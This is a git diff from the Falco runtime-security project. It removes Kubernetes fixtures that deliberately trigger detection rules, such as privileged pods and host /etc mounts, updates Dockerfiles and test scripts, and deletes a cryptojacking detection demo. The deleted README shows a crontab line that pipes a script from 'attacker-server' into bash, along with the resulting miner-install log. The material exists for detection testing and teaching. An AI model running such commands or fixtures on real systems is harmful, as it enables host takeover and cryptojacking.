-    echo "***Deleting all resources in falco-eg-sandbox namespace..."
-    kubectl delete --all configmaps -n falco-eg-sandbox
-    kubectl delete --all deployments -n falco-eg-sandbox
-    kubectl delete --all services -n falco-eg-sandbox
-    kubectl delete --all roles -n falco-eg-sandbox
-    kubectl delete --all serviceaccounts -n falco-eg-sandbox
-
-    # We don't delete all rolebindings in the falco-eg-sandbox
-    # namespace, as that would also delete the rolebinding for the
-    # event generator itself.
-    kubectl delete rolebinding vanilla-role-binding -n falco-eg-sandbox || true
-
-    for file in yaml/*.yaml; do
-
-	MATCH=0
-	if [[ "${RULE}" == "all" ]]; then
-	    MATCH=1
-	else
-	    RET=$(grep -E "falco.rules:.*${RULE}" $file || true)
-	    if [[ "$RET" != "" ]]; then
-		MATCH=1
-	    fi
-	fi
-
-	if [[ $MATCH == 1 ]]; then
-	    MESSAGES=$(grep -E 'message' $file | cut -d: -f2 | tr '\n' ',')
-	    RULES=$(grep -E 'falco.rules' $file | cut -d: -f2 | tr '\n' ',')
-
-	    # The message uses dashes in place of spaces, convert them back to spaces
-	    MESSAGES=$(echo "$MESSAGES" | tr '-' ' ' | sed -e 's/ *//' | sed  -e 's/,$//')
-	    RULES=$(echo "$RULES" | tr '-' ' '| tr '.' '/' | sed -e 's/ *//' | sed  -e 's/,$//')
-
-	    echo "***$MESSAGES (Rule(s) $RULES)..."
-	    kubectl apply -f $file -n falco-eg-sandbox
-	    sleep 2
-	fi
-    done
-
-    sleep 10
-done
--- a/docker/event-generator/yaml/configmap-private-creds.yaml
+++ b/docker/event-generator/yaml/configmap-private-creds.yaml
@@ -1,15 +0,0 @@
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: private-creds-configmap
-  labels:
-    app.kubernetes.io/name: private-creds-configmap
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create.Modify-Configmap-With-Private-Credentials
-    message: Creating-configmap-with-private-credentials
-data:
-  ui.properties: |
-    color.good=purple
-    color.bad=yellow
-    allow.textmode=true
-    password=some_secret_password
--- a/docker/event-generator/yaml/disallowed-pod-deployment.yaml
+++ b/docker/event-generator/yaml/disallowed-pod-deployment.yaml
@@ -1,24 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: disallowed-pod-deployment
-  labels:
-    app.kubernetes.io/name: disallowed-pod-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-Disallowed-Pod
-    message: Creating-pod-with-image-outside-of-allowed-images
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: disallowed-pod-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: disallowed-pod-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
--- a/docker/event-generator/yaml/hostnetwork-deployment.yaml
+++ b/docker/event-generator/yaml/hostnetwork-deployment.yaml
@@ -1,25 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: hostnetwork-deployment
-  labels:
-    app.kubernetes.io/name: hostnetwork-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-HostNetwork-Pod
-    message: Creating-deployment-with-hostNetwork-true-pod
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: hostnetwork-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: hostnetwork-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      hostNetwork: true
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
--- a/docker/event-generator/yaml/nodeport-service.yaml
+++ b/docker/event-generator/yaml/nodeport-service.yaml
@@ -1,15 +0,0 @@
-apiVersion: v1
-kind: Service
-metadata:
-  name: nodeport-service
-  labels:
-    app.kubernetes.io/name: nodeport-service
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-NodePort-Service
-    message: Creating-service-of-type-NodePort
-spec:
-  type: NodePort
-  ports:
-    - port: 80
-  selector:
-    app: busybox
--- a/docker/event-generator/yaml/privileged-deployment.yaml
+++ b/docker/event-generator/yaml/privileged-deployment.yaml
@@ -1,26 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: privileged-deployment
-  labels:
-    app.kubernetes.io/name: privileged-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-Privileged-Pod
-    message: Creating-deployment-with-privileged-true-pod
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: privileged-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: privileged-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - securityContext:
-            privileged: true
-          name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
--- a/docker/event-generator/yaml/role-pod-exec.yaml
+++ b/docker/event-generator/yaml/role-pod-exec.yaml
@@ -1,16 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: pod-exec-role
-  labels:
-    app.kubernetes.io/name: pod-exec-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: ClusterRole-With-Pod-Exec-Created
-    message: Creating-role-that-can-exec-to-pods
-rules:
- apiGroups:
-    - ""
-  resources:
-    - "pods/exec"
-  verbs:
-    - get
--- a/docker/event-generator/yaml/role-wildcard-resources.yaml
+++ b/docker/event-generator/yaml/role-wildcard-resources.yaml
@@ -1,16 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: wildcard-resources-role
-  labels:
-    app.kubernetes.io/name: wildcard-resources-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: ClusterRole-With-Write-Privileges-Created
-    message: Creating-role-with-wildcard-resources
-rules:
- apiGroups:
-    - ""
-  resources:
-    - "*"
-  verbs:
-    - get
--- a/docker/event-generator/yaml/role-write-privileges.yaml
+++ b/docker/event-generator/yaml/role-write-privileges.yaml
@@ -1,16 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: write-privileges-role
-  labels:
-    app.kubernetes.io/name: write-privileges-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: ClusterRole-With-Write-Privileges-Created
-    message: Creating-role-with-write-privileges
-rules:
- apiGroups:
-    - ""
-  resources:
-    - "pods"
-  verbs:
-    - create
--- a/docker/event-generator/yaml/sensitive-mount-deployment.yaml
+++ b/docker/event-generator/yaml/sensitive-mount-deployment.yaml
@@ -1,31 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: sensitive-mount-deployment
-  labels:
-    app.kubernetes.io/name: sensitive-mount-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-Sensitive-Mount-Pod
-    message: Creating-deployment-with-pod-mounting-sensitive-path-from-host
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: sensitive-mount-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: sensitive-mount-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
-          volumeMounts:
-            - mountPath: /host/etc
-              name: etc
-      volumes:
-        - name: etc
-          hostPath:
-            path: /etc
--- a/docker/event-generator/yaml/vanilla-configmap.yaml
+++ b/docker/event-generator/yaml/vanilla-configmap.yaml
@@ -1,14 +0,0 @@
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: vanilla-configmap
-  labels:
-    app.kubernetes.io/name: vanilla-configmap
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-ConfigMap-Created
-    message: Creating-configmap
-data:
-  ui.properties: |
-    color.good=purple
-    color.bad=yellow
-    allow.textmode=true
--- a/docker/event-generator/yaml/vanilla-deployment.yaml
+++ b/docker/event-generator/yaml/vanilla-deployment.yaml
@@ -1,24 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: vanilla-deployment
-  labels:
-    app.kubernetes.io/name: vanilla-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Deployment-Created
-    message: Creating-deployment
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: vanilla-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: vanilla-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
--- a/docker/event-generator/yaml/vanilla-role-rolebinding-serviceaccount.yaml
+++ b/docker/event-generator/yaml/vanilla-role-rolebinding-serviceaccount.yaml
@@ -1,43 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: vanilla-role
-  labels:
-    app.kubernetes.io/name: vanilla-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Role.Clusterrole-Created
-    message: Creating-role
-rules:
- apiGroups:
-    - ""
-  resources:
-    - "pods"
-  verbs:
-    - list
---
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
-  name: vanilla-role-binding
-  labels:
-    app.kubernetes.io/name: vanilla-role-binding
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Role.Clusterrolebinding-Created
-    message: Creating-rolebinding
-roleRef:
-  kind: Role
-  name: vanilla-role
-  apiGroup: rbac.authorization.k8s.io
-subjects:
-  - kind: ServiceAccount
-    name: vanilla-service-account
---
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: vanilla-serviceaccount
-  labels:
-    app.kubernetes.io/name: vanilla-serviceaccount
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Serviceaccount-Created
-    message: Creating-serviceaccount
--- a/docker/event-generator/yaml/vanilla-service.yaml
+++ b/docker/event-generator/yaml/vanilla-service.yaml
@@ -1,15 +0,0 @@
-apiVersion: v1
-kind: Service
-metadata:
-  name: vanilla-service
-  labels:
-    app.kubernetes.io/name: vanilla-service
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Service-Created
-    message: Creating-service
-spec:
-  type: ClusterIP
-  ports:
-    - port: 80
-  selector:
-    app: busybox
--- a/docker/stable/Dockerfile
+++ b/docker/stable/Dockerfile
@@ -2,7 +2,7 @@ FROM debian:stable

 LABEL maintainer="cncf-falco-dev@lists.cncf.io"

-LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+LABEL usage="docker run -i -t --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc --name NAME IMAGE"

 ARG FALCO_VERSION=latest
 ARG VERSION_BUCKET=deb
--- a/docker/stable/docker-entrypoint.sh
+++ b/docker/stable/docker-entrypoint.sh
@@ -1,6 +1,6 @@
 #!/usr/bin/env bash
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
@@ -16,11 +16,14 @@
 # limitations under the License.
 #

-# set -e
+# todo(leogr): remove deprecation notice within a couple of releases
+if [[ ! -z "${SKIP_MODULE_LOAD}" ]]; then
+    echo "* SKIP_MODULE_LOAD is deprecated and will be removed soon, use SKIP_DRIVER_LOADER instead"
+fi

-# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
+# Set the SKIP_DRIVER_LOADER variable to skip loading the driver

-if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
+if [[ -z "${SKIP_DRIVER_LOADER}" ]] && [[ -z "${SKIP_MODULE_LOAD}" ]]; then
    echo "* Setting up /usr/src links from host"

    for i in "$HOST_ROOT/usr/src"/*
--- a/docker/local/docker-entrypoint.sh
+++ b/docker/local/docker-entrypoint.sh
@@ -1,6 +1,6 @@
 #!/usr/bin/env bash
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
@@ -16,11 +16,10 @@
 # limitations under the License.
 #

-# set -e

-# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
+# Set the SKIP_DRIVER_LOADER variable to skip loading the driver

-if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
+if [[ -z "${SKIP_DRIVER_LOADER}" ]]; then
    echo "* Setting up /usr/src links from host"

    for i in "$HOST_ROOT/usr/src"/*
--- a/docker/minimal/Dockerfile
+++ b/docker/minimal/Dockerfile
@@ -1,58 +0,0 @@
-FROM ubuntu:18.04 as ubuntu
-
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
-
-ARG FALCO_VERSION
-ARG VERSION_BUCKET=bin
-
-ENV FALCO_VERSION=${FALCO_VERSION}
-ENV VERSION_BUCKET=${VERSION_BUCKET}
-
-WORKDIR /
-
-ADD https://bintray.com/api/ui/download/falcosecurity/${VERSION_BUCKET}/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
-
-RUN apt-get update -y && \
-    apt-get install -y libyaml-0-2 binutils && \
-    tar -xvf falco-${FALCO_VERSION}-x86_64.tar.gz && \
-    rm -f falco-${FALCO_VERSION}-x86_64.tar.gz && \
-    mv falco-${FALCO_VERSION}-x86_64 falco && \
-    strip falco/usr/bin/falco && \
-    apt-get clean && \
-    rm -rf /var/lib/apt/lists/*
-
-FROM scratch
-
-COPY --from=ubuntu /lib/x86_64-linux-gnu/libanl.so.1 \
-    /lib/x86_64-linux-gnu/libc.so.6 \
-    /lib/x86_64-linux-gnu/libdl.so.2 \
-    /lib/x86_64-linux-gnu/libgcc_s.so.1 \
-    /lib/x86_64-linux-gnu/libm.so.6 \
-    /lib/x86_64-linux-gnu/libnsl.so.1 \
-    /lib/x86_64-linux-gnu/libnss_compat.so.2 \
-    /lib/x86_64-linux-gnu/libnss_files.so.2 \
-    /lib/x86_64-linux-gnu/libnss_nis.so.2 \
-    /lib/x86_64-linux-gnu/libpthread.so.0 \
-    /lib/x86_64-linux-gnu/librt.so.1 \
-    /lib/x86_64-linux-gnu/libz.so.1 \
-    /lib/x86_64-linux-gnu/
-
-COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libstdc++.so.6 \
-    /usr/lib/x86_64-linux-gnu/libstdc++.so.6
-
-COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libyaml-0.so.2.0.5 \
-    /usr/lib/x86_64-linux-gnu/libyaml-0.so.2
-
-COPY --from=ubuntu /etc/ld.so.cache \
-    /etc/nsswitch.conf \
-    /etc/ld.so.cache \
-    /etc/passwd \
-    /etc/group \
-    /etc/
-
-COPY --from=ubuntu /etc/default/nss /etc/default/nss
-COPY --from=ubuntu /lib64/ld-linux-x86-64.so.2 /lib64/ld-linux-x86-64.so.2
-
-COPY --from=ubuntu /falco /
-
-CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]
--- a/docker/no-driver/Dockerfile
+++ b/docker/no-driver/Dockerfile
@@ -0,0 +1,33 @@
+FROM ubuntu:18.04 as ubuntu
+
+ARG FALCO_VERSION
+ARG VERSION_BUCKET=bin
+
+ENV FALCO_VERSION=${FALCO_VERSION}
+ENV VERSION_BUCKET=${VERSION_BUCKET}
+
+WORKDIR /
+
+ADD https://bintray.com/api/ui/download/falcosecurity/${VERSION_BUCKET}/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
+
+RUN tar -xvf falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    rm -f falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    mv falco-${FALCO_VERSION}-x86_64 falco && \
+    rm -rf falco/usr/src/falco-* falco/usr/bin/falco-driver-loader
+
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /falco/etc/falco/falco.yaml > /falco/etc/falco/falco.yaml.new \
+    && mv /falco/etc/falco/falco.yaml.new /falco/etc/falco/falco.yaml
+
+FROM scratch
+
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+LABEL usage="docker run -i -t --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro --name NAME IMAGE"
+# NOTE: for the "least privileged" use case, please refer to the official documentation
+
+ENV HOST_ROOT /host
+ENV HOME /root
+
+COPY --from=ubuntu /falco /
+
+CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]
--- a/docker/slim/Dockerfile
+++ b/docker/slim/Dockerfile
@@ -1,48 +0,0 @@
-FROM ubuntu:18.04
-
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
-
-LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name <name> <image>"
-
-ARG FALCO_VERSION=latest
-ARG VERSION_BUCKET=deb
-
-ENV FALCO_VERSION=${FALCO_VERSION}
-ENV VERSION_BUCKET=${VERSION_BUCKET}
-
-ENV HOST_ROOT /host
-ENV HOME /root
-
-RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
-
-RUN apt-get update \
-  && apt-get install -y --no-install-recommends \
-  # bash-completion \
-  # bc \
-  ca-certificates \
-  curl \
-  gnupg2 \
-  jq \
-  # netcat \
-  # xz-utils \
-  && rm -rf /var/lib/apt/lists/*
-
-RUN curl -s https://falco.org/repo/falcosecurity-3672BA8F.asc | apt-key add - \
-  && echo "deb https://dl.bintray.com/falcosecurity/${VERSION_BUCKET} stable main" | tee -a /etc/apt/sources.list.d/falcosecurity.list \
-  && apt-get update -y \
-  && if [ "$FALCO_VERSION" = "latest" ]; then apt-get install -y --no-install-recommends falco; else apt-get install -y --no-install-recommends falco=${FALCO_VERSION}; fi \
-  && apt-get clean \
-  && rm -rf /var/lib/apt/lists/*
-
-# Change the falco config within the container to enable ISO 8601
-# output.
-RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
-  && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
-
-# Some base images have an empty /lib/modules by default
-# If it's not empty, docker build will fail instead of
-# silently overwriting the existing directory
-RUN rm -df /lib/modules \
-  && ln -s $HOST_ROOT/lib/modules /lib/modules
-
-CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]
--- a/docker/tester/Dockerfile
+++ b/docker/tester/Dockerfile
@@ -1,16 +1,20 @@
 FROM fedora:31

 LABEL name="falcosecurity/falco-tester"
-LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build -e FALCO_VERSION=<current_falco_version> --name <name> falcosecurity/falco-tester test"
+LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build --name <name> falcosecurity/falco-tester test"
 LABEL maintainer="cncf-falco-dev@lists.cncf.io"

 ENV FALCO_VERSION=
 ENV BUILD_TYPE=release

+ADD https://github.com/fullstorydev/grpcurl/releases/download/v1.6.0/grpcurl_1.6.0_linux_x86_64.tar.gz /
 RUN dnf install -y python-pip python docker findutils jq unzip && dnf clean all
 ENV PATH="/root/.local/bin/:${PATH}"
 RUN pip install --user avocado-framework==69.0
 RUN pip install --user avocado-framework-plugin-varianter-yaml-to-mux==69.0
+RUN pip install --user watchdog==0.10.2
+RUN pip install --user pathtools==0.1.2
+RUN tar -C /usr/bin -xvf grpcurl_1.6.0_linux_x86_64.tar.gz

 COPY ./root /

--- a/docker/tester/root/runners/deb.Dockerfile
+++ b/docker/tester/root/runners/deb.Dockerfile
@@ -6,7 +6,7 @@ RUN test -n FALCO_VERSION
 ENV FALCO_VERSION ${FALCO_VERSION}

 RUN apt update -y
-RUN apt install dkms libyaml-0-2 -y
+RUN apt install dkms -y

 ADD falco-${FALCO_VERSION}-x86_64.deb /
 RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
--- a/docker/tester/root/runners/tar.gz.Dockerfile
+++ b/docker/tester/root/runners/tar.gz.Dockerfile
@@ -0,0 +1,21 @@
+FROM ubuntu:18.04
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+ARG FALCO_VERSION=
+RUN test -n FALCO_VERSION
+ENV FALCO_VERSION ${FALCO_VERSION}
+
+RUN apt update -y
+RUN apt install dkms curl -y
+
+ADD falco-${FALCO_VERSION}-x86_64.tar.gz /
+RUN cp -R /falco-${FALCO_VERSION}-x86_64/* /
+
+# Change the falco config within the container to enable ISO 8601 output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+    && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+COPY rules/*.yaml /rules/
+COPY trace_files/*.scap /traces/
+
+CMD ["/usr/bin/falco"]
--- a/docker/tester/root/usr/bin/entrypoint
+++ b/docker/tester/root/usr/bin/entrypoint
@@ -1,12 +1,15 @@
 #!/usr/bin/env bash

-set -eu -o pipefail
+BUILD_DIR=${BUILD_DIR:-/build}
+SOURCE_DIR=${SOURCE_DIR:-/source}
+SKIP_PACKAGES_TESTS=${SKIP_PACKAGES_TESTS:-false}

-SOURCE_DIR=/source
-BUILD_DIR=/build
 CMD=${1:-test}
 shift

+# Stop the execution if a command in the pipeline has an error, from now on
+set -e -u -o pipefail
+
 # build type can be "debug" or "release", fallbacks to "release" by default
 BUILD_TYPE=$(echo "$BUILD_TYPE" | tr "[:upper:]" "[:lower:]")
 case "$BUILD_TYPE" in
@@ -47,7 +50,8 @@ case "$CMD" in
 "test")
    if [ -z "$FALCO_VERSION" ]; then
        echo "Automatically figuring out Falco version."
-        FALCO_VERSION=$("$BUILD_DIR/$BUILD_TYPE/userspace/falco/falco" --version | head -n 1 | cut -d' ' -f3 | tr -d '\r')
+        FALCO_VERSION_FULL=$("$BUILD_DIR/$BUILD_TYPE/userspace/falco/falco" --version)
+        FALCO_VERSION=$(echo "$FALCO_VERSION_FULL" | head -n 1 | cut -d' ' -f3  | tr -d '\r')
        echo "Falco version: $FALCO_VERSION"
    fi
    if [ -z "$FALCO_VERSION" ]; then
@@ -56,8 +60,11 @@ case "$CMD" in
    fi

    # build docker images
-    build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "deb"
-    build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "rpm"
+    if [ "$SKIP_PACKAGES_TESTS" = false ] ; then
+        build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "deb"
+        build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "rpm"
+        build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "tar.gz"
+    fi

    # check that source directory contains Falco
    if [ ! -d "$SOURCE_DIR/falco/test" ]; then
@@ -68,11 +75,14 @@ case "$CMD" in
    # run tests
    echo "Running regression tests ..."
    cd "$SOURCE_DIR/falco/test"
-    ./run_regression_tests.sh "$BUILD_DIR/$BUILD_TYPE"
+    SKIP_PACKAGES_TESTS=$SKIP_PACKAGES_TESTS ./run_regression_tests.sh -d "$BUILD_DIR/$BUILD_TYPE"

    # clean docker images
-    clean_image "deb"
-    clean_image "rpm"
+    if [ "$SKIP_PACKAGES_TESTS" = false ] ; then
+        clean_image "deb"
+        clean_image "rpm"
+        clean_image "tar.gz"
+    fi
    ;;
 "bash")
    CMD=/bin/bash
--- a/docker/tester/root/usr/bin/usage
+++ b/docker/tester/root/usr/bin/usage
@@ -30,7 +30,7 @@ How to use.

 How to build.

-    * cd docker/builder && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-tester .
+    * cd docker/tester && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-tester .

 Environment.

--- a/examples/OWNERS
+++ b/examples/OWNERS
@@ -1,2 +0,0 @@
-labels:
-  - area/examples
--- a/examples/bad-mount-cryptomining/README.md
+++ b/examples/bad-mount-cryptomining/README.md
@@ -1,117 +0,0 @@
-# Demo of Falco Detecting Cryptomining Exploit
-
-## Introduction
-
-Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Falco.
-
-Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
-
-## Requirements
-
-In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
-
-## Example architecture
-
-The example consists of the following:
-
-* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
-* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
-* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
-
-All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
-
-A separate container is created to launch the attack:
-
-* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
-
-## Example Walkthrough
-
-### Start everything using docker-compose
-
-To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
-
-Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
-
-You will see fairly verbose output from dockerd:
-
-```
-host-machine_1     | crond: crond (busybox 1.27.2) started, log level 6
-host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
-host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
-host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
-```
-
-When you see log output like the following, you know that falco is started and ready:
-
-```
-falco_1            | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
-falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
-falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
-```
-
-### Launch malicious container
-
-To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
-
-The script `launch_malicious_container.sh` performs the necessary POSTs:
-
-* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
-* `http://localhost:2375/containers/create?&name=docker123321-mysql`
-* `http://localhost:2375/containers/docker123321-mysql/start`
-
-Run the script via `bash launch_malicious_container.sh`.
-
-### Examine cron output as malicious software is installed & run
-
-`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
-
-```
-* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
-```
-
-It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg))  from `attacker-server` and run it.
-
-You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
-
-```
-CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS               NAMES
-68ed578bd034        alpine:latest       "/bin/sh -c 'echo '*…"   About a minute ago   Up About a minute                       docker123321-mysql
-```
-
-Once the cron job runs, you will see output like the following:
-
-```
-host-machine_1     | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
-host-machine_1     | ***Checking for existing Miner program
-attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
-host-machine_1     | ***Killing competing Miner programs
-host-machine_1     | ***Reinstalling cron job to run Miner program
-host-machine_1     | ***Configuring Miner program
-attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
-attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
-host-machine_1     | ***Configuring system for Miner program
-host-machine_1     | vm.nr_hugepages = 9
-host-machine_1     | ***Running Miner program
-host-machine_1     | ***Ensuring Miner program is alive
-host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
-host-machine_1     | /var/tmp
-host-machine_1     | runing.....
-host-machine_1     | ***Ensuring Miner program is alive
-host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
